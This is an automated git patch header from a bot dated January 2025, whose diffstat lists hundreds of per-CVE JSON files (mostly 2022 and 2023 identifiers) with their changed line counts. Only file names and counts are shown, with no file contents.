From 298fff475aa2ad4667629ba8aecc822fd500c07f Mon Sep 17 00:00:00 2001 From: motikan2010-bot Date: Wed, 8 Jan 2025 09:32:44 +0900 Subject: [PATCH] Auto Update 2025/01/08 00:32:44 --- 2014/CVE-2014-4210.json | 8 +- 2015/CVE-2015-6639.json | 8 +- 2016/CVE-2016-0638.json | 8 +- 2016/CVE-2016-2431.json | 4 +- 2017/CVE-2017-3248.json | 8 +- 2017/CVE-2017-5638.json | 8 +- 2018/CVE-2018-2628.json | 8 +- 2019/CVE-2019-2618.json | 8 +- 2020/CVE-2020-2551.json | 8 +- 2020/CVE-2020-35489.json | 2 +- 2020/CVE-2020-6287.json | 8 +- 2020/CVE-2020-8840.json | 2 +- 2021/CVE-2021-3129.json | 8 +- 2021/CVE-2021-39685.json | 8 +- 2021/CVE-2021-4034.json | 8 +- 2021/CVE-2021-41773.json | 2 +- 2021/CVE-2021-41805.json | 31 + 2021/CVE-2021-42278.json | 8 +- 2021/CVE-2021-44228.json | 31 - 2022/CVE-2022-0155.json | 33 + 2022/CVE-2022-0165.json | 72 + 2022/CVE-2022-0185.json | 93 + 2022/CVE-2022-0219.json | 33 + 2022/CVE-2022-0236.json | 66 + 2022/CVE-2022-0316.json | 42 + 2022/CVE-2022-0332.json | 33 + 2022/CVE-2022-0337.json | 62 + 2022/CVE-2022-0412.json | 38 + 2022/CVE-2022-0435.json | 33 + 2022/CVE-2022-0439.json | 33 + 2022/CVE-2022-0441.json | 97 + 2022/CVE-2022-0482.json | 31 + 2022/CVE-2022-0492.json | 193 + 2022/CVE-2022-0529.json | 64 + 2022/CVE-2022-0543.json | 93 + 2022/CVE-2022-0591.json | 40 + 2022/CVE-2022-0666.json | 33 + 2022/CVE-2022-0725.json | 33 + 2022/CVE-2022-0739.json | 255 + 2022/CVE-2022-0778.json | 124 + 2022/CVE-2022-0811.json | 33 + 2022/CVE-2022-0824.json | 104 + 2022/CVE-2022-0847.json | 2352 ++++ 2022/CVE-2022-0848.json | 64 + 2022/CVE-2022-0853.json | 33 + 2022/CVE-2022-0944.json | 252 + 2022/CVE-2022-0952.json | 33 + 2022/CVE-2022-0995.json | 95 + 2022/CVE-2022-1011.json | 33 + 2022/CVE-2022-1012.json | 33 + 2022/CVE-2022-1015.json | 279 + 2022/CVE-2022-1026.json | 95 + 2022/CVE-2022-10270.json | 33 + 2022/CVE-2022-1040.json | 186 + 2022/CVE-2022-1068.json | 33 + 2022/CVE-2022-1096.json | 33 + 2022/CVE-2022-1119.json | 33 + 2022/CVE-2022-1162.json | 31 + 2022/CVE-2022-1203.json | 33 + 2022/CVE-2022-1227.json | 33 + 2022/CVE-2022-1292.json | 62 + 2022/CVE-2022-1329.json | 93 + 2022/CVE-2022-1364.json | 33 + 2022/CVE-2022-1386.json | 164 + 2022/CVE-2022-1388.json | 546 + 2022/CVE-2022-1421.json | 33 + 2022/CVE-2022-1442.json | 33 + 2022/CVE-2022-1471.json | 64 + 2022/CVE-2022-14733.json | 33 + 2022/CVE-2022-1565.json | 33 + 2022/CVE-2022-1609.json | 31 + 2022/CVE-2022-1679.json | 64 + 2022/CVE-2022-1802.json | 33 + 2022/CVE-2022-20007.json | 31 + 2022/CVE-2022-20009.json | 33 + 2022/CVE-2022-20120.json | 33 + 2022/CVE-2022-20126.json | 33 + 2022/CVE-2022-20128.json | 33 + 2022/CVE-2022-20130.json | 33 + 2022/CVE-2022-20138.json | 64 + 2022/CVE-2022-20140.json | 33 + 2022/CVE-2022-20142.json | 64 + 2022/CVE-2022-20186.json | 64 + 2022/CVE-2022-20223.json | 33 + 2022/CVE-2022-20224.json | 64 + 2022/CVE-2022-20229.json | 33 + 2022/CVE-2022-20338.json | 95 + 2022/CVE-2022-20347.json | 95 + 2022/CVE-2022-20360.json | 33 + 2022/CVE-2022-20361.json | 38 + 2022/CVE-2022-20409.json | 37 + 2022/CVE-2022-20413.json | 33 + 2022/CVE-2022-20421.json | 33 + 2022/CVE-2022-20452.json | 33 + 2022/CVE-2022-20456.json | 33 + 2022/CVE-2022-20470.json | 33 + 2022/CVE-2022-20473.json | 64 + 2022/CVE-2022-20474.json | 33 + 2022/CVE-2022-20489.json | 64 + 2022/CVE-2022-20490.json | 33 + 2022/CVE-2022-20492.json | 33 + 2022/CVE-2022-20493.json | 33 + 2022/CVE-2022-20494.json | 33 + 2022/CVE-2022-20607.json | 33 + 2022/CVE-2022-20699.json | 95 + 2022/CVE-2022-2078.json | 33 + 2022/CVE-2022-20818.json | 39 + 2022/CVE-2022-20866.json | 33 + 2022/CVE-2022-2097.json | 33 + 2022/CVE-2022-2109.json | 33 + 2022/CVE-2022-21241.json | 38 + 2022/CVE-2022-21306.json | 33 + 2022/CVE-2022-21340.json | 41 + 2022/CVE-2022-21350.json | 33 + 2022/CVE-2022-21371.json | 111 + 2022/CVE-2022-21392.json | 39 + 2022/CVE-2022-21445.json | 33 + 2022/CVE-2022-21449.json | 126 + 2022/CVE-2022-21500.json | 40 + 2022/CVE-2022-21587.json | 95 + 2022/CVE-2022-21658.json | 37 + 2022/CVE-2022-21660.json | 64 + 2022/CVE-2022-21661.json | 346 + 2022/CVE-2022-21668.json | 33 + 2022/CVE-2022-21839.json | 33 + 2022/CVE-2022-2185.json | 64 + 2022/CVE-2022-21877.json | 33 + 2022/CVE-2022-21881.json | 33 + 2022/CVE-2022-21882.json | 192 + 2022/CVE-2022-21894.json | 196 + 2022/CVE-2022-21907.json | 341 + 2022/CVE-2022-21970.json | 43 + 2022/CVE-2022-21971.json | 77 + 2022/CVE-2022-21974.json | 41 + 2022/CVE-2022-21999.json | 36 + 2022/CVE-2022-22029.json | 33 + 2022/CVE-2022-22057.json | 33 + 2022/CVE-2022-22063.json | 42 + 2022/CVE-2022-22274.json | 95 + 2022/CVE-2022-22296.json | 33 + 2022/CVE-2022-22536.json | 64 + 2022/CVE-2022-22555.json | 33 + 2022/CVE-2022-22582.json | 33 + 2022/CVE-2022-22600.json | 33 + 2022/CVE-2022-22620.json | 62 + 2022/CVE-2022-22629.json | 33 + 2022/CVE-2022-22720.json | 33 + 2022/CVE-2022-22733.json | 40 + 2022/CVE-2022-2274.json | 107 + 2022/CVE-2022-22818.json | 33 + 2022/CVE-2022-22828.json | 33 + 2022/CVE-2022-22845.json | 33 + 2022/CVE-2022-22850.json | 33 + 2022/CVE-2022-22851.json | 33 + 2022/CVE-2022-22852.json | 33 + 2022/CVE-2022-22885.json | 64 + 2022/CVE-2022-22909.json | 31 + 2022/CVE-2022-22947.json | 1337 +++ 2022/CVE-2022-22954.json | 100 + 2022/CVE-2022-22963.json | 730 ++ 2022/CVE-2022-22965.json | 991 ++ 2022/CVE-2022-22966.json | 33 + 2022/CVE-2022-22970.json | 33 + 2022/CVE-2022-22971.json | 33 + 2022/CVE-2022-22978.json | 155 + 2022/CVE-2022-22980.json | 31 + 2022/CVE-2022-23046.json | 62 + 2022/CVE-2022-23093.json | 76 + 2022/CVE-2022-23131.json | 631 + 2022/CVE-2022-23222.json | 62 + 2022/CVE-2022-23277.json | 33 + 2022/CVE-2022-23303.json | 33 + 2022/CVE-2022-23305.json | 64 + 2022/CVE-2022-23361.json | 33 + 2022/CVE-2022-23378.json | 33 + 2022/CVE-2022-23529.json | 33 + 2022/CVE-2022-23614.json | 68 + 2022/CVE-2022-23648.json | 33 + 2022/CVE-2022-23731.json | 45 + 2022/CVE-2022-23773.json | 95 + 2022/CVE-2022-23779.json | 64 + 2022/CVE-2022-23812.json | 33 + 2022/CVE-2022-23861.json | 40 + 2022/CVE-2022-23862.json | 39 + 2022/CVE-2022-23884.json | 33 + 2022/CVE-2022-23935.json | 131 + 2022/CVE-2022-23940.json | 42 + 2022/CVE-2022-23967.json | 33 + 2022/CVE-2022-23988.json | 33 + 2022/CVE-2022-24086.json | 197 + 2022/CVE-2022-24112.json | 286 + 2022/CVE-2022-24122.json | 38 + 2022/CVE-2022-24124.json | 72 + 2022/CVE-2022-2414.json | 126 + 2022/CVE-2022-24227.json | 33 + 2022/CVE-2022-24342.json | 41 + 2022/CVE-2022-24439.json | 33 + 2022/CVE-2022-24442.json | 43 + 2022/CVE-2022-24481.json | 33 + 2022/CVE-2022-24500.json | 33 + 2022/CVE-2022-24637.json | 223 + 2022/CVE-2022-24654.json | 33 + 2022/CVE-2022-2466.json | 33 + 2022/CVE-2022-24702.json | 36 + 2022/CVE-2022-24706.json | 31 + 2022/CVE-2022-24715.json | 95 + 2022/CVE-2022-24716.json | 157 + 2022/CVE-2022-24760.json | 33 + 2022/CVE-2022-24780.json | 39 + 2022/CVE-2022-24818.json | 40 + 2022/CVE-2022-24834.json | 64 + 2022/CVE-2022-24934.json | 62 + 2022/CVE-2022-24990.json | 124 + 2022/CVE-2022-24992.json | 33 + 2022/CVE-2022-25012.json | 33 + 2022/CVE-2022-25018.json | 33 + 2022/CVE-2022-25020.json | 33 + 2022/CVE-2022-25022.json | 33 + 2022/CVE-2022-25060.json | 33 + 2022/CVE-2022-25061.json | 33 + 2022/CVE-2022-25062.json | 33 + 2022/CVE-2022-25063.json | 33 + 2022/CVE-2022-25064.json | 64 + 2022/CVE-2022-25257.json | 64 + 2022/CVE-2022-25258.json | 33 + 2022/CVE-2022-25260.json | 41 + 2022/CVE-2022-25265.json | 39 + 2022/CVE-2022-25313.json | 31 + 2022/CVE-2022-25315.json | 31 + 2022/CVE-2022-25365.json | 33 + 2022/CVE-2022-25375.json | 33 + 2022/CVE-2022-2546.json | 33 + 2022/CVE-2022-25479.json | 33 + 2022/CVE-2022-25636.json | 62 + 2022/CVE-2022-25640.json | 33 + 2022/CVE-2022-25765.json | 284 + 2022/CVE-2022-25813.json | 41 + 2022/CVE-2022-25845.json | 157 + 2022/CVE-2022-2586.json | 64 + 2022/CVE-2022-2588.json | 250 + 2022/CVE-2022-2590.json | 47 + 2022/CVE-2022-25927.json | 33 + 2022/CVE-2022-25943.json | 31 + 2022/CVE-2022-25949.json | 33 + 2022/CVE-2022-2602.json | 95 + 2022/CVE-2022-26134.json | 1051 ++ 2022/CVE-2022-26135.json | 31 + 2022/CVE-2022-26138.json | 132 + 2022/CVE-2022-26265.json | 71 + 2022/CVE-2022-26318.json | 62 + 2022/CVE-2022-26377.json | 33 + 2022/CVE-2022-2639.json | 126 + 2022/CVE-2022-26485.json | 33 + 2022/CVE-2022-26488.json | 33 + 2022/CVE-2022-26503.json | 33 + 2022/CVE-2022-26629.json | 64 + 2022/CVE-2022-26763.json | 33 + 2022/CVE-2022-26766.json | 33 + 2022/CVE-2022-26809.json | 62 + 2022/CVE-2022-26923.json | 124 + 2022/CVE-2022-26937.json | 39 + 2022/CVE-2022-26965.json | 33 + 2022/CVE-2022-27226.json | 38 + 2022/CVE-2022-27251.json | 33 + 2022/CVE-2022-27254.json | 33 + 2022/CVE-2022-27255.json | 70 + 2022/CVE-2022-27413.json | 33 + 2022/CVE-2022-27414.json | 33 + 2022/CVE-2022-27499.json | 33 + 2022/CVE-2022-27502.json | 38 + 2022/CVE-2022-27518.json | 33 + 2022/CVE-2022-27646.json | 41 + 2022/CVE-2022-27666.json | 64 + 2022/CVE-2022-27925.json | 391 + 2022/CVE-2022-27927.json | 33 + 2022/CVE-2022-27997.json | 33 + 2022/CVE-2022-28079.json | 33 + 2022/CVE-2022-28080.json | 33 + 2022/CVE-2022-28117.json | 31 + 2022/CVE-2022-28118.json | 33 + 2022/CVE-2022-28171.json | 64 + 2022/CVE-2022-28219.json | 62 + 2022/CVE-2022-28282.json | 33 + 2022/CVE-2022-28346.json | 62 + 2022/CVE-2022-28368.json | 100 + 2022/CVE-2022-28381.json | 33 + 2022/CVE-2022-28672.json | 75 + 2022/CVE-2022-2884.json | 41 + 2022/CVE-2022-29063.json | 40 + 2022/CVE-2022-29072.json | 62 + 2022/CVE-2022-29078.json | 132 + 2022/CVE-2022-29154.json | 33 + 2022/CVE-2022-29170.json | 33 + 2022/CVE-2022-29361.json | 64 + 2022/CVE-2022-29380.json | 33 + 2022/CVE-2022-29455.json | 155 + 2022/CVE-2022-29464.json | 348 + 2022/CVE-2022-29469.json | 33 + 2022/CVE-2022-29581.json | 64 + 2022/CVE-2022-29582.json | 33 + 2022/CVE-2022-29856.json | 33 + 2022/CVE-2022-29885.json | 31 + 2022/CVE-2022-2992.json | 74 + 2022/CVE-2022-30075.json | 31 + 2022/CVE-2022-30114.json | 33 + 2022/CVE-2022-30129.json | 33 + 2022/CVE-2022-30136.json | 64 + 2022/CVE-2022-30190.json | 564 + 2022/CVE-2022-30203.json | 44 + 2022/CVE-2022-30206.json | 73 + 2022/CVE-2022-30216.json | 33 + 2022/CVE-2022-30333.json | 157 + 2022/CVE-2022-30507.json | 33 + 2022/CVE-2022-30524.json | 33 + 2022/CVE-2022-30525.json | 62 + 2022/CVE-2022-30526.json | 33 + 2022/CVE-2022-30592.json | 38 + 2022/CVE-2022-30594.json | 33 + 2022/CVE-2022-30600.json | 33 + 2022/CVE-2022-30780.json | 31 + 2022/CVE-2022-30887.json | 33 + 2022/CVE-2022-30929.json | 33 + 2022/CVE-2022-31007.json | 33 + 2022/CVE-2022-31061.json | 33 + 2022/CVE-2022-31101.json | 75 + 2022/CVE-2022-31138.json | 33 + 2022/CVE-2022-31144.json | 33 + 2022/CVE-2022-31181.json | 39 + 2022/CVE-2022-31188.json | 33 + 2022/CVE-2022-31262.json | 33 + 2022/CVE-2022-31269.json | 64 + 2022/CVE-2022-31479.json | 33 + 2022/CVE-2022-31499.json | 33 + 2022/CVE-2022-31626.json | 33 + 2022/CVE-2022-31629.json | 33 + 2022/CVE-2022-3168.json | 33 + 2022/CVE-2022-31691.json | 33 + 2022/CVE-2022-31692.json | 64 + 2022/CVE-2022-31705.json | 33 + 2022/CVE-2022-3172.json | 33 + 2022/CVE-2022-31749.json | 31 + 2022/CVE-2022-31793.json | 33 + 2022/CVE-2022-31798.json | 33 + 2022/CVE-2022-31814.json | 265 + 2022/CVE-2022-31854.json | 33 + 2022/CVE-2022-31889.json | 33 + 2022/CVE-2022-31890.json | 33 + 2022/CVE-2022-31897.json | 33 + 2022/CVE-2022-31898.json | 38 + 2022/CVE-2022-31901.json | 33 + 2022/CVE-2022-31902.json | 33 + 2022/CVE-2022-32060.json | 33 + 2022/CVE-2022-32073.json | 33 + 2022/CVE-2022-32074.json | 33 + 2022/CVE-2022-32132.json | 33 + 2022/CVE-2022-32199.json | 33 + 2022/CVE-2022-32206.json | 33 + 2022/CVE-2022-32223.json | 33 + 2022/CVE-2022-32224.json | 33 + 2022/CVE-2022-32250.json | 157 + 2022/CVE-2022-32548.json | 33 + 2022/CVE-2022-32832.json | 64 + 2022/CVE-2022-32862.json | 33 + 2022/CVE-2022-32883.json | 35 + 2022/CVE-2022-32898.json | 33 + 2022/CVE-2022-32932.json | 33 + 2022/CVE-2022-32947.json | 33 + 2022/CVE-2022-32981.json | 33 + 2022/CVE-2022-33075.json | 33 + 2022/CVE-2022-33082.json | 33 + 2022/CVE-2022-3317.json | 33 + 2022/CVE-2022-33174.json | 33 + 2022/CVE-2022-3328.json | 33 + 2022/CVE-2022-3357.json | 33 + 2022/CVE-2022-33679.json | 126 + 2022/CVE-2022-3368.json | 64 + 2022/CVE-2022-33891.json | 374 + 2022/CVE-2022-33980.json | 160 + 2022/CVE-2022-34169.json | 64 + 2022/CVE-2022-34265.json | 126 + 2022/CVE-2022-34527.json | 33 + 2022/CVE-2022-34556.json | 33 + 2022/CVE-2022-3464.json | 33 + 2022/CVE-2022-34683.json | 33 + 2022/CVE-2022-34715.json | 33 + 2022/CVE-2022-34718.json | 33 + 2022/CVE-2022-34753.json | 37 + 2022/CVE-2022-34913.json | 33 + 2022/CVE-2022-34918.json | 157 + 2022/CVE-2022-34919.json | 33 + 2022/CVE-2022-34970.json | 33 + 2022/CVE-2022-35131.json | 33 + 2022/CVE-2022-3518.json | 33 + 2022/CVE-2022-35405.json | 40 + 2022/CVE-2022-35411.json | 33 + 2022/CVE-2022-35416.json | 33 + 2022/CVE-2022-3546.json | 33 + 2022/CVE-2022-35500.json | 33 + 2022/CVE-2022-35501.json | 33 + 2022/CVE-2022-35513.json | 39 + 2022/CVE-2022-3552.json | 33 + 2022/CVE-2022-3564.json | 33 + 2022/CVE-2022-35649.json | 33 + 2022/CVE-2022-35698.json | 38 + 2022/CVE-2022-35737.json | 64 + 2022/CVE-2022-35841.json | 33 + 2022/CVE-2022-35899.json | 33 + 2022/CVE-2022-3590.json | 64 + 2022/CVE-2022-35914.json | 250 + 2022/CVE-2022-35919.json | 33 + 2022/CVE-2022-3602.json | 261 + 2022/CVE-2022-36067.json | 64 + 2022/CVE-2022-36162.json | 33 + 2022/CVE-2022-36163.json | 33 + 2022/CVE-2022-36193.json | 33 + 2022/CVE-2022-36200.json | 33 + 2022/CVE-2022-36231.json | 33 + 2022/CVE-2022-36234.json | 33 + 2022/CVE-2022-36267.json | 43 + 2022/CVE-2022-36271.json | 33 + 2022/CVE-2022-36432.json | 33 + 2022/CVE-2022-36433.json | 33 + 2022/CVE-2022-36446.json | 103 + 2022/CVE-2022-36532.json | 33 + 2022/CVE-2022-36537.json | 76 + 2022/CVE-2022-36539.json | 33 + 2022/CVE-2022-36553.json | 41 + 2022/CVE-2022-3656.json | 33 + 2022/CVE-2022-36663.json | 33 + 2022/CVE-2022-36752.json | 33 + 2022/CVE-2022-36779.json | 64 + 2022/CVE-2022-36804.json | 494 + 2022/CVE-2022-36944.json | 33 + 2022/CVE-2022-36946.json | 71 + 2022/CVE-2022-3699.json | 95 + 2022/CVE-2022-37017.json | 33 + 2022/CVE-2022-37032.json | 33 + 2022/CVE-2022-37042.json | 95 + 2022/CVE-2022-37177.json | 33 + 2022/CVE-2022-37201.json | 33 + 2022/CVE-2022-37202.json | 33 + 2022/CVE-2022-37203.json | 33 + 2022/CVE-2022-37204.json | 33 + 2022/CVE-2022-37205.json | 33 + 2022/CVE-2022-37206.json | 33 + 2022/CVE-2022-37207.json | 33 + 2022/CVE-2022-37208.json | 33 + 2022/CVE-2022-37209.json | 33 + 2022/CVE-2022-37210.json | 33 + 2022/CVE-2022-37298.json | 33 + 2022/CVE-2022-37332.json | 33 + 2022/CVE-2022-37434.json | 95 + 2022/CVE-2022-37703.json | 33 + 2022/CVE-2022-37704.json | 33 + 2022/CVE-2022-37705.json | 33 + 2022/CVE-2022-37706.json | 219 + 2022/CVE-2022-37708.json | 33 + 2022/CVE-2022-3786.json | 33 + 2022/CVE-2022-37969.json | 33 + 2022/CVE-2022-38029.json | 33 + 2022/CVE-2022-38181.json | 95 + 2022/CVE-2022-38374.json | 64 + 2022/CVE-2022-38553.json | 33 + 2022/CVE-2022-38577.json | 33 + 2022/CVE-2022-38601.json | 33 + 2022/CVE-2022-38604.json | 54 + 2022/CVE-2022-38691.json | 36 + 2022/CVE-2022-38694.json | 67 + 2022/CVE-2022-38725.json | 33 + 2022/CVE-2022-38766.json | 33 + 2022/CVE-2022-38789.json | 33 + 2022/CVE-2022-38813.json | 33 + 2022/CVE-2022-3904.json | 33 + 2022/CVE-2022-39066.json | 45 + 2022/CVE-2022-39073.json | 42 + 2022/CVE-2022-3910.json | 64 + 2022/CVE-2022-39196.json | 33 + 2022/CVE-2022-39197.json | 479 + 2022/CVE-2022-39227.json | 73 + 2022/CVE-2022-39253.json | 64 + 2022/CVE-2022-39275.json | 33 + 2022/CVE-2022-39299.json | 33 + 2022/CVE-2022-3942.json | 33 + 2022/CVE-2022-39425.json | 33 + 2022/CVE-2022-3949.json | 33 + 2022/CVE-2022-39802.json | 72 + 2022/CVE-2022-39838.json | 33 + 2022/CVE-2022-39841.json | 33 + 2022/CVE-2022-3992.json | 33 + 2022/CVE-2022-39952.json | 126 + 2022/CVE-2022-39959.json | 38 + 2022/CVE-2022-39986.json | 64 + 2022/CVE-2022-39987.json | 95 + 2022/CVE-2022-40032.json | 33 + 2022/CVE-2022-40126.json | 33 + 2022/CVE-2022-40127.json | 69 + 2022/CVE-2022-40140.json | 95 + 2022/CVE-2022-40146.json | 64 + 2022/CVE-2022-40297.json | 53 + 2022/CVE-2022-40317.json | 33 + 2022/CVE-2022-40347.json | 33 + 2022/CVE-2022-40348.json | 33 + 2022/CVE-2022-40363.json | 33 + 2022/CVE-2022-4047.json | 75 + 2022/CVE-2022-40470.json | 33 + 2022/CVE-2022-40471.json | 43 + 2022/CVE-2022-40490.json | 33 + 2022/CVE-2022-40494.json | 41 + 2022/CVE-2022-4060.json | 43 + 2022/CVE-2022-4061.json | 42 + 2022/CVE-2022-40624.json | 33 + 2022/CVE-2022-4063.json | 40 + 2022/CVE-2022-40634.json | 43 + 2022/CVE-2022-40635.json | 42 + 2022/CVE-2022-40684.json | 731 ++ 2022/CVE-2022-40687.json | 33 + 2022/CVE-2022-40769.json | 33 + 2022/CVE-2022-40799.json | 37 + 2022/CVE-2022-40881.json | 33 + 2022/CVE-2022-40916.json | 33 + 2022/CVE-2022-4096.json | 33 + 2022/CVE-2022-41034.json | 33 + 2022/CVE-2022-41040.json | 293 + 2022/CVE-2022-41080.json | 33 + 2022/CVE-2022-41082.json | 261 + 2022/CVE-2022-41099.json | 157 + 2022/CVE-2022-41114.json | 33 + 2022/CVE-2022-41218.json | 33 + 2022/CVE-2022-41220.json | 33 + 2022/CVE-2022-41272.json | 33 + 2022/CVE-2022-41333.json | 33 + 2022/CVE-2022-41343.json | 38 + 2022/CVE-2022-41352.json | 102 + 2022/CVE-2022-41358.json | 33 + 2022/CVE-2022-41401.json | 33 + 2022/CVE-2022-41412.json | 33 + 2022/CVE-2022-41413.json | 33 + 2022/CVE-2022-41445.json | 33 + 2022/CVE-2022-41446.json | 33 + 2022/CVE-2022-41544.json | 64 + 2022/CVE-2022-41622.json | 33 + 2022/CVE-2022-41678.json | 41 + 2022/CVE-2022-41717.json | 33 + 2022/CVE-2022-41741.json | 33 + 2022/CVE-2022-41828.json | 33 + 2022/CVE-2022-41852.json | 76 + 2022/CVE-2022-41853.json | 38 + 2022/CVE-2022-41876.json | 33 + 2022/CVE-2022-41903.json | 33 + 2022/CVE-2022-41923.json | 33 + 2022/CVE-2022-41924.json | 33 + 2022/CVE-2022-41966.json | 33 + 2022/CVE-2022-42045.json | 33 + 2022/CVE-2022-42046.json | 36 + 2022/CVE-2022-42094.json | 33 + 2022/CVE-2022-42095.json | 33 + 2022/CVE-2022-42096.json | 33 + 2022/CVE-2022-42097.json | 33 + 2022/CVE-2022-42098.json | 33 + 2022/CVE-2022-42176.json | 33 + 2022/CVE-2022-42475.json | 223 + 2022/CVE-2022-4262.json | 95 + 2022/CVE-2022-42703.json | 64 + 2022/CVE-2022-42864.json | 33 + 2022/CVE-2022-42889.json | 1441 +++ 2022/CVE-2022-42896.json | 157 + 2022/CVE-2022-42899.json | 33 + 2022/CVE-2022-4304.json | 33 + 2022/CVE-2022-43096.json | 33 + 2022/CVE-2022-43097.json | 33 + 2022/CVE-2022-43117.json | 33 + 2022/CVE-2022-43143.json | 33 + 2022/CVE-2022-43144.json | 33 + 2022/CVE-2022-43271.json | 33 + 2022/CVE-2022-43293.json | 54 + 2022/CVE-2022-43332.json | 33 + 2022/CVE-2022-43343.json | 33 + 2022/CVE-2022-43369.json | 33 + 2022/CVE-2022-43571.json | 33 + 2022/CVE-2022-43680.json | 64 + 2022/CVE-2022-43704.json | 33 + 2022/CVE-2022-4395.json | 33 + 2022/CVE-2022-43959.json | 33 + 2022/CVE-2022-43980.json | 33 + 2022/CVE-2022-44118.json | 33 + 2022/CVE-2022-44136.json | 33 + 2022/CVE-2022-44149.json | 79 + 2022/CVE-2022-44183.json | 33 + 2022/CVE-2022-44215.json | 33 + 2022/CVE-2022-44268.json | 804 ++ 2022/CVE-2022-44276.json | 33 + 2022/CVE-2022-44311.json | 69 + 2022/CVE-2022-44312.json | 33 + 2022/CVE-2022-44318.json | 33 + 2022/CVE-2022-44569.json | 33 + 2022/CVE-2022-44666.json | 33 + 2022/CVE-2022-44721.json | 33 + 2022/CVE-2022-44789.json | 33 + 2022/CVE-2022-44830.json | 33 + 2022/CVE-2022-44870.json | 33 + 2022/CVE-2022-44875.json | 33 + 2022/CVE-2022-44877.json | 286 + 2022/CVE-2022-44900.json | 33 + 2022/CVE-2022-45003.json | 33 + 2022/CVE-2022-45004.json | 33 + 2022/CVE-2022-45025.json | 70 + 2022/CVE-2022-45047.json | 33 + 2022/CVE-2022-45059.json | 33 + 2022/CVE-2022-4510.json | 95 + 2022/CVE-2022-45217.json | 33 + 2022/CVE-2022-45265.json | 33 + 2022/CVE-2022-45299.json | 33 + 2022/CVE-2022-45354.json | 33 + 2022/CVE-2022-4539.json | 33 + 2022/CVE-2022-4543.json | 33 + 2022/CVE-2022-45436.json | 33 + 2022/CVE-2022-45451.json | 33 + 2022/CVE-2022-45472.json | 33 + 2022/CVE-2022-45477.json | 39 + 2022/CVE-2022-45511.json | 33 + 2022/CVE-2022-45544.json | 33 + 2022/CVE-2022-45599.json | 33 + 2022/CVE-2022-45600.json | 33 + 2022/CVE-2022-45688.json | 157 + 2022/CVE-2022-45701.json | 83 + 2022/CVE-2022-45728.json | 33 + 2022/CVE-2022-45729.json | 33 + 2022/CVE-2022-45770.json | 33 + 2022/CVE-2022-45771.json | 75 + 2022/CVE-2022-45808.json | 33 + 2022/CVE-2022-45934.json | 95 + 2022/CVE-2022-45988.json | 33 + 2022/CVE-2022-46080.json | 84 + 2022/CVE-2022-46087.json | 33 + 2022/CVE-2022-46104.json | 33 + 2022/CVE-2022-4611.json | 64 + 2022/CVE-2022-4616.json | 33 + 2022/CVE-2022-46164.json | 33 + 2022/CVE-2022-46166.json | 33 + 2022/CVE-2022-46169.json | 1072 ++ 2022/CVE-2022-46175.json | 33 + 2022/CVE-2022-46196.json | 33 + 2022/CVE-2022-46381.json | 33 + 2022/CVE-2022-46395.json | 95 + 2022/CVE-2022-46463.json | 95 + 2022/CVE-2022-46484.json | 33 + 2022/CVE-2022-46485.json | 33 + 2022/CVE-2022-46505.json | 33 + 2022/CVE-2022-46604.json | 37 + 2022/CVE-2022-46622.json | 33 + 2022/CVE-2022-46623.json | 33 + 2022/CVE-2022-46689.json | 455 + 2022/CVE-2022-46718.json | 33 + 2022/CVE-2022-46836.json | 33 + 2022/CVE-2022-47102.json | 33 + 2022/CVE-2022-47130.json | 33 + 2022/CVE-2022-47131.json | 33 + 2022/CVE-2022-47132.json | 33 + 2022/CVE-2022-47197.json | 64 + 2022/CVE-2022-47373.json | 33 + 2022/CVE-2022-47529.json | 33 + 2022/CVE-2022-47615.json | 33 + 2022/CVE-2022-47872.json | 33 + 2022/CVE-2022-47909.json | 33 + 2022/CVE-2022-47952.json | 33 + 2022/CVE-2022-47966.json | 172 + 2022/CVE-2022-47986.json | 110 + 2022/CVE-2022-48150.json | 33 + 2022/CVE-2022-48194.json | 33 + 2022/CVE-2022-48197.json | 33 + 2022/CVE-2022-48311.json | 33 + 2022/CVE-2022-48429.json | 33 + 2022/CVE-2022-48474.json | 33 + 2022/CVE-2022-48565.json | 33 + 2022/CVE-2022-4896.json | 33 + 2022/CVE-2022-4939.json | 33 + 2022/CVE-2022-4944.json | 33 + 2023/CVE-2023-0045.json | 64 + 2023/CVE-2023-0099.json | 33 + 2023/CVE-2023-0156.json | 33 + 2023/CVE-2023-0157.json | 33 + 2023/CVE-2023-0159.json | 42 + 2023/CVE-2023-0179.json | 64 + 2023/CVE-2023-0264.json | 33 + 2023/CVE-2023-0266.json | 33 + 2023/CVE-2023-0297.json | 188 + 2023/CVE-2023-0315.json | 33 + 2023/CVE-2023-0386.json | 376 + 2023/CVE-2023-0400.json | 33 + 2023/CVE-2023-0461.json | 33 + 2023/CVE-2023-0464.json | 33 + 2023/CVE-2023-0630.json | 38 + 2023/CVE-2023-0656.json | 33 + 2023/CVE-2023-0669.json | 161 + 2023/CVE-2023-0748.json | 33 + 2023/CVE-2023-08.json | 33 + 2023/CVE-2023-0830.json | 33 + 2023/CVE-2023-0860.json | 33 + 2023/CVE-2023-0861.json | 33 + 2023/CVE-2023-1112.json | 33 + 2023/CVE-2023-1177.json | 163 + 2023/CVE-2023-1326.json | 126 + 2023/CVE-2023-1337.json | 33 + 2023/CVE-2023-1389.json | 64 + 2023/CVE-2023-1415.json | 33 + 2023/CVE-2023-1430.json | 33 + 2023/CVE-2023-1454.json | 219 + 2023/CVE-2023-1488.json | 33 + 2023/CVE-2023-1498.json | 33 + 2023/CVE-2023-1665.json | 33 + 2023/CVE-2023-1671.json | 97 + 2023/CVE-2023-1698.json | 95 + 2023/CVE-2023-1718.json | 33 + 2023/CVE-2023-1767.json | 33 + 2023/CVE-2023-1773.json | 33 + 2023/CVE-2023-1829.json | 33 + 2023/CVE-2023-1874.json | 39 + 2023/CVE-2023-1999.json | 33 + 2023/CVE-2023-2002.json | 33 + 2023/CVE-2023-20025.json | 33 + 2023/CVE-2023-20048.json | 37 + 2023/CVE-2023-20052.json | 64 + 2023/CVE-2023-20073.json | 33 + 2023/CVE-2023-2008.json | 33 + 2023/CVE-2023-20110.json | 33 + 2023/CVE-2023-20126.json | 33 + 2023/CVE-2023-20178.json | 33 + 2023/CVE-2023-20198.json | 817 ++ 2023/CVE-2023-20209.json | 33 + 2023/CVE-2023-2023.json | 64 + 2023/CVE-2023-2024.json | 33 + 2023/CVE-2023-20273.json | 33 + 2023/CVE-2023-2033.json | 162 + 2023/CVE-2023-20562.json | 64 + 2023/CVE-2023-20573.json | 33 + 2023/CVE-2023-20593.json | 37 + 2023/CVE-2023-20598.json | 33 + 2023/CVE-2023-20860.json | 33 + 2023/CVE-2023-20872.json | 33 + 2023/CVE-2023-20887.json | 97 + 2023/CVE-2023-20909.json | 64 + 2023/CVE-2023-20911.json | 33 + 